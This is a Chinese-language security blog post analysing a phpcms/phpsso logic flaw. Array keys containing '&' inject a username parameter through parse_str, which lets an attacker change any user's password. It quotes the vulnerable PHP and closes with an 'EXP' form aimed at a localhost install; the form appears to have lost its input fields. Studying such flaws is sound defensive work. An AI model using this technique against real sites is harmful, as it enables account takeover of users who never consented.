eSafe白帽駭客資安網-網絡安全背後的巨人,提供駭客,網站入侵測試,網站被駭,網站漏洞,駭客入侵,資訊安全,入侵,ecshop,wordpress,漏洞修復,木馬清除,資安服務

Phpcms 最新任意用戶密碼 修改邏輯漏洞

       phpcms2013年裡出現了嚴重的密碼用戶漏洞,代碼如下:
parse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);
在phpsso_server/phpcms/modules/phpsso/classes/phpsso.class.php中。

       我們知道parse_str類似將http請求轉換成php變量的函數,所以,也像http請求在php的環境下一樣,如果提交?a=sss&a=aaa,那麼a的結果會是aaa,不是sss。所以我們知道這個函數有一個問題了,如果後面提交一個內容,它會覆蓋前面的。也就是username=zhangsan&username=lisi的話,那麼用戶名就不是zhangsan了。要構造這樣的請求,我們還是要回到通行證的client看看,我們有沒有這樣的機會。其實我們有這樣的機會,看看代碼,如下:

 

&lt;<code>public function auth_data($data) {
  $s = $sep = '';
  foreach($data as $k =&gt; $v) {
   if(is_array($v)) {
    $s2 = $sep2 = '';
    foreach($v as $k2 =&gt; $v2) {
      $s2 .= "$sep2{$k}[$k2]=".$this-&gt;_ps_stripslashes($v2);
     $sep2 = '&amp;';
    }
    $s .= $sep.$s2;
   } else {
    $s .= "$sep$k=".$this-&gt;_ps_stripslashes($v);
   }
   $sep = '&amp;';
  }
 
  $auth_s = 'v='.$this-&gt;ps_vsersion.'&amp;appid='.APPID.'&amp;data='.urlencode($this-&gt;sys_auth($s));
  return $auth_s;
 }</code>

可能我沒說明白,對,傳遞進來的數組的key是可控的。如果我的key裡包含[]&這樣三個字符的話,那麼我就能重寫這樣的東西。

舉個簡單的例子:$a[aaa=a&bbb] = ‘a’;會變成aaa=a&bbb=a明白了麼,對,就是通過沒有注意到的key,我們可以構造出多餘的參數來。
這個時候,我們可以再去看一個函數。就在這個文件內:

<code>public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='') {
  if($email &amp;&amp; !$this-&gt;_is_email($email)) {
   return -4;
  }
  return $this-&gt;_ps_send('edit', array('username'=&gt;$username, 'password'=&gt;$password, 'newpassword'=&gt;$newpassword, 'email'=&gt;$email, 'uid'=&gt;$uid, 'random'=&gt;$random));
 }</code>

這是向通行證發了這樣一個請求。我們再跟到通信證代碼裡去看看,就會有所發現。
public function edit() {//能省就省,太長了不是嗎?
if($this->username) {
//如果提交了用戶名,則按照用戶名修改記錄,反之,按照uid來修改記錄。

    $res = $this->db->update($data, array('username'=>$this->username));
   } else {
    file_put_contents('typeb.txt',print_r($data,1).$this->uid);
    $res = $this->db->update($data, array('uid'=>$this->uid));
   }

好,我們知道了,如果提交了用戶名,就會按照用戶名來修改記錄,不然就按照uid,我們看看函數結構:
public function ps_member_edit($username, $email, $password=”, $newpassword=”, $uid=”, $random=”)
很好,uid要是無法控制的話,後面只剩下一個random了,但是username就在第一個,只要email,password,newpassword,有任何一個可以控制,就可以修改密碼了。

我當然找到了:
phpcms9/phpcms/modules/member/index.php
$res = $this->client->ps_member_edit('', $email, $_POST['info']['password'], $_POST['info']['newpassword'], $this->memberinfo['phpssouid'], $this->memberinfo['encrypt']);
然後就沒有然後了。
 
EXP:
<form id=”myform” action=”http://localhost/phpcms9/index.php?m=member&amp;c=index&amp;a=account_manage_password&amp;t=1″ method=”post” name=”myform”>
<table width=”100%” cellspacing=”0″>
<tbody>
<tr>
<th width=”80″>郵箱:</th>
 </tr>
<tr>
<th width=”80″>原密碼:</th>
新密碼:     </tr>
</tbody>
 </table>
</form>

分享: